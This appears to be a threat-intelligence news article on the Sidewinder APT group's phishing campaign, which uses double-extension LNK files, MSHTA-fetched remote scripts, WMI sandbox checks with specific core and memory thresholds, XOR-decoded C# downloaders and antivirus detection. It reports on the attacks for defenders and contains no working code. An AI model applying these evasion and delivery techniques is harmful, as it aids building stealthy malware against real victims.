“`html
The infamous APT-C-24 threat group, referred to as Sidewinder or Rattlesnake, has evolved its attack strategies by implementing sophisticated LNK file-based phishing initiatives targeting the governmental, energy, military, and mining industries across South Asia.
Since gaining attention in 2012, this advanced persistent threat collective has transitioned from its conventional exploitation of Microsoft Office vulnerabilities, adopting a more clandestine tactic utilizing weaponized shortcut files to activate remote malicious scripts.
Recent samples of attacks uncovered by cybersecurity researchers demonstrate a meticulously executed campaign where victims receive compressed folders containing three harmful LNK files, each created with dual extensions such as “file 1.docx.lnk,” “file 2.docx.lnk,” and “file 3.docx.lnk.”
These misleading filenames are strategically designed to mimic legitimate document files, exploiting user confidence and enhancing the likelihood of execution.
The attackers have enhanced their delivery methods to optimize infection chances by offering multiple entry points within a single package.
Ctfiot analysts discovered that these LNK files exploit the Microsoft HTML Application Host (MSHTA) program to execute harmful scripts hosted on remote command-and-control servers.
The remote URLs show a unique pattern, concluding with parameters “yui=0,” “yui=1,” and “yui=2,” serving as distinctive identifiers for each variant while maintaining functionality across all three files.
.webp)
The attack strategy reveals refined environmental awareness capabilities, with the malicious scripts conducting thorough system reconnaissance before advancing with payload distribution.
Upon activation, the initial JavaScript component executes anti-analysis inspections by interrogating system specifications through Windows Management Instrumentation (WMI), specifically inspecting processor core counts and physical memory allocation to differentiate between genuine target environments and security research sandboxes.
Advanced Evasion and Payload Deployment Techniques
The group’s technical expertise is apparent in their multi-layered obfuscation methodologies and conditional payload delivery systems.
The initial HTML application serves dual purposes by concurrently delivering decoy content to sustain victim deception while ensuring persistence through memory-resident attack components.
The harmful script interrogates processor cores using “SELECT NumberOfCores FROM Win32_Processor” and necessitates a minimum of two cores along with 810MB of physical memory before moving forward with payload decryption.
Once environmental validations are successful, the script employs Base64 decoding coupled with XOR encryption to decrypt and reflectively load an extensively obfuscated C# downloader component.
This intricate payload conducts security software detection, searching for processes linked to Kaspersky, ESET, and various endpoint protection solutions before establishing communication with command-and-control infrastructure.
The attackers illustrate operational security awareness by swiftly rotating compromised domains and selectively delivering advanced payloads solely to victims fulfilling specific targeting criteria, considerably complicating security research efforts and threat detection activities.
“`